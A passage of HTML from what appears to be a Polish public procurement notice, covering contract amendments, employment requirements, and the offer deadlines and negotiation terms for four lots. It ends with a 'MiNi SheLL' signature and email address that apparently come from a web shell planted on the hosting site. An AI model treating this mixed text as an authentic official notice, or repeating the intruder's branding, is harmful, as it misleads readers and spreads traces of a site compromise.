ustawy Prawo zamówień publicznych<br/>Zmiana umowy wymaga – pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com